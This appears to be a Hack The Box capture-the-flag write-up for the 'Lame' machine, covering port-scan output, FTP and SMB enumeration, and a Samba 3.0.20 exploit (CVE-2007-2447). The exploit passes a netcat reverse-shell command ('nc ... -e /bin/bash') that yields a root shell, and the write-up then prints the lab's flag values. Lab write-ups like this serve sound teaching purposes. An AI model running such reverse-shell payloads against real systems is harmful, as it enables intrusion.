Lame

Recon

nmap_scan.log

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.3:21
Open 10.10.10.3:22
Open 10.10.10.3:139
Open 10.10.10.3:445
Open 10.10.10.3:3632
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.10.10.3
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-27 19:52 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:53
Completed Parallel DNS resolution of 1 host. at 19:53, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:53
Scanning 10.10.10.3 [5 ports]
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 3632/tcp on 10.10.10.3
Completed Connect Scan at 19:53, 0.08s elapsed (5 total ports)
Initiating Service scan at 19:53
Scanning 5 services on 10.10.10.3
Completed Service scan at 19:53, 11.25s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.10.3.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
NSE: [ftp-bounce 10.10.10.3:21] PORT response: 500 Illegal PORT command.
NSE Timing: About 99.86% done; ETC: 19:53 (0:00:00 remaining)
Completed NSE at 19:53, 40.23s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.58s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for 10.10.10.3
Host is up, received user-set (0.078s latency).
Scanned at 2024-07-27 19:53:00 UTC for 53s

PORT     STATE SERVICE     REASON  VERSION
21/tcp   open  ftp         syn-ack vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.37
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALz4hsc8a2Srq4nlW960qV8xwBG0JC+jI7fWxm5METIJH4tKr/xUTwsTYEYnaZLzcOiy21D3ZvOwYb6AA3765zdgCd2Tgand7F0YD5UtXG7b7fbz99chReivL0SIWEG/E96Ai+pqYMP2WD5KaOJwSIXSUajnU5oWmY5x85sBw+XDAAAAFQDFkMpmdFQTF+oRqaoSNVU7Z+hjSwAAAIBCQxNKzi1TyP+QJIFa3M0oLqCVWI0We/ARtXrzpBOJ/dt0hTJXCeYisKqcdwdtyIn8OUCOyrIjqNuA2QW217oQ6wXpbFh+5AQm8Hl3b6C6o8lX3Ptw+Y4dp0lzfWHwZ/jzHwtuaDQaok7u1f971lEazeJLqfiWrAzoklqSWyDQJAAAAIA1lAD3xWYkeIeHv/R3P9i+XaoI7imFkMuYXCDTq843YU6Td+0mWpllCqAWUV/CQamGgQLtYy5S0ueoks01MoKdOMMhKVwqdr08nvCBdNKjIEd3gH6oBk/YRnjzxlEAYBsvCmM4a0jmhz0oNiRWlc/F+bkUeFKrBx/D2fdfZmhrGg==
|   2048 5656240f211ddea72bae61b1243de8f3 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew==
139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-07-27T15:54:37-04:00
|_clock-skew: mean: 2h01m23s, deviation: 2h49m43s, median: 1m22s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59488/tcp): CLEAN (Timeout)
|   Check 2 (port 58198/tcp): CLEAN (Timeout)
|   Check 3 (port 51269/udp): CLEAN (Timeout)
|   Check 4 (port 40169/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.13 seconds

FTP (21)

FTP 2.3.4 version is famous for having a backdoor and straight up root shell, but exploit doesn't seem to work..

└─$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:woyag): uwu:)
331 Please specify the password.
Password:
500 OOPS: priv_sock_get_result
ftp: Login failed

Connecting anonymously yields no results, ftp is empty.

SMB (139/445)

└─$ netexec smb 10.10.10.3 -u '' -p '' --shares
SMB         10.10.10.3      445    LAME             [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB         10.10.10.3      445    LAME             [+] hackthebox.gr\:
SMB         10.10.10.3      445    LAME             [*] Enumerated shares
SMB         10.10.10.3      445    LAME             Share           Permissions     Remark
SMB         10.10.10.3      445    LAME             -----           -----------     ------
SMB         10.10.10.3      445    LAME             print$                          Printer Drivers
SMB         10.10.10.3      445    LAME             tmp             READ,WRITE      oh noes!
SMB         10.10.10.3      445    LAME             opt
SMB         10.10.10.3      445    LAME             IPC$                            IPC Service (lame server (Samba 3.0.20-Debian))
SMB         10.10.10.3      445    LAME             ADMIN$                          IPC Service (lame server (Samba 3.0.20-Debian))

└─$ smbclient -N //10.10.10.3/opt
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Lame]
└─$ smbclient -N //10.10.10.3/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 27 16:06:06 2024
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  orbit-makis                        DR        0  Sat Jul 27 06:25:31 2024
  odgdkw                              N        0  Sat Jul 27 12:18:32 2024
  .ICE-unix                          DH        0  Fri Jul 26 16:14:16 2024
  vmware-root                        DR        0  Fri Jul 26 16:15:02 2024
  WFGYOZHNLE                          D        0  Fri Jul 26 16:24:49 2024
  .X11-unix                          DH        0  Fri Jul 26 16:14:42 2024
  gconfd-makis                       DR        0  Sat Jul 27 06:25:31 2024
  .X0-lock                           HR       11  Fri Jul 26 16:14:42 2024
  bojtot                              N        0  Fri Jul 26 16:58:42 2024
  5555.jsvc_up                        R        0  Fri Jul 26 16:15:18 2024
  vgauthsvclog.txt.0                  R     1600  Fri Jul 26 16:14:15 2024

                7282168 blocks of size 1024. 5385656 blocks available
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \odgdkw of size 0 as odgdkw (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \.X0-lock of size 11 as .X0-lock (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \bojtot of size 0 as bojtot (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED opening remote file \5555.jsvc_up
getting file \vgauthsvclog.txt.0 of size 1600 as vgauthsvclog.txt.0 (5.0 KiloBytes/sec) (average 1.4 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \orbit-makis\*
NT_STATUS_ACCESS_DENIED listing \vmware-root\*
NT_STATUS_ACCESS_DENIED opening remote file \.X11-unix\X0
NT_STATUS_ACCESS_DENIED listing \gconfd-makis\*
└─$ find . -empty -delete
└─$ lta
drwxr-xr-x    - woyag 27 Jul 16:06 .
.rw-r--r-- 1.6k woyag 27 Jul 16:05 └── vgauthsvclog.txt.0

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Lame/smb]
└─$ bat vgauthsvclog.txt.0
───────┬───────────────────────────────────────────────────────────────────
       │ File: vgauthsvclog.txt.0
───────┼───────────────────────────────────────────────────────────────────
   1   │ [Jul 26 16:14:14.744] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
   2   │ [Jul 26 16:14:14.744] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
   3   │ [Jul 26 16:14:14.744] [ message] [VGAuthService] Group 'service'
   4   │ [Jul 26 16:14:14.744] [ message] [VGAuthService]     samlSchemaDir=/usr/lib/vmware-vgauth/schemas
   5   │ [Jul 26 16:14:14.744] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
   6   │ [Jul 26 16:14:15.094] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
   7   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
   8   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Group 'service'
   9   │ [Jul 26 16:14:15.095] [ message] [VGAuthService]     samlSchemaDir=/usr/lib/vmware-vgauth/schemas
  10   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
  11   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Cannot load message catalog for domain 'VGAuthService', language 'C', catalog dir '.'.
  12   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] INIT SERVICE
  13   │ [Jul 26 16:14:15.095] [ message] [VGAuthService] Using '/var/lib/vmware/VGAuth/aliasStore' for alias store root directory
  14   │ [Jul 26 16:14:15.174] [ message] [VGAuthService] SAMLCreateAndPopulateGrammarPool: Using '/usr/lib/vmware-vgauth/schemas' for SAML schemas
  15   │ [Jul 26 16:14:15.304] [ message] [VGAuthService] SAML_Init: Allowing 300 of clock skew for SAML date validation
  16   │ [Jul 26 16:14:15.304] [ message] [VGAuthService] BEGIN SERVICE
───────┴───────────────────────────────────────────────────────────────────

The version of SMB 3.0.20 seems to be vulnerable to CVE-2007-2447-in-Python

└─$ py smbExploit.py 10.10.10.3 139 'nc 10.10.14.37 4444 -e /bin/bash'
[*] Sending the payload
---
└─$ listen
Ncat: Connection from 10.10.10.3:43005.
id # <- PS1 not visible
uid=0(root) gid=0(root)

Flags (from SMB)

cat /root/root.txt
05e0bd6ef0c84daaa82120cb3f5a8968
cat /home/makis/user.txt
31bc2e4d6bab2ae2d559bf08f7995c29

PreviousIClean NextMist

Last updated 1 month ago